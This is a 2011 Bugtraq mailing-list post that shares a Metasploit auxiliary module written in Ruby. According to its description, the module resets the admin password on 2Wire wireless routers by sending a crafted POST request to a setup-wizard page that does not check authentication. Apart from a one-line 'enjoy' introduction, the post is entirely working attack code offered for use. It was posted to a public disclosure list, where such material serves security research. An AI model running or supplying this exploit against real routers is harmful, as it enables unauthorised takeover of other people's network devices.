[<prev] [next>] [day] [month] [year] [list]
Message-ID: <201106221822.p5MIMVh5023829@sf01web2.securityfocus.com>
Date: Wed, 22 Jun 2011 18:22:31 GMT
From: techhelperjax@...il.com
To: bugtraq@...urityfocus.com
Subject: 2wire password reset module
attached is a metasploit module I coded to reset the admin password on a 2wire wireless router. enjoy
==============================================================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
], self.class)
end
def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end
Powered by blists - more mailing lists